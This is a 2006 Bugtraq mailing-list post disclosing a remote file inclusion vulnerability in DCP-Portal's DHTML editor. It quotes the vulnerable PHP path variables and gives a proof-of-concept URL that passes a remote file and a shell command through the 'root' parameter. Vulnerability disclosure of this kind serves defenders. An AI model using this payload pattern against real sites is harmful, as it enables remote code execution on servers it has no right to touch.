lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20060613083035.32688.qmail@securityfocus.com>
Date: 13 Jun 2006 08:30:35 -0000
From: botan@...uxmail.org
To: bugtraq@...urityfocus.com
Subject: [Kurdish Security # 8] DCP-Portal Remote File Include
 Vulnerability [Editor DHTML]


# Kurdish Security Advisory
# irc.gigachat.net #kurdhack 
# http://www.milw0rm.com/exploits/1905
# Editor DHTML Scripting bugz 

$url_path_editor = "$root_url/library/editor/"; 
$abs_path_editor = "$root/library/editor/"; 

?>

Proof Of Concept 

http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.yourscripts.com/x.txt?cmd=id

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ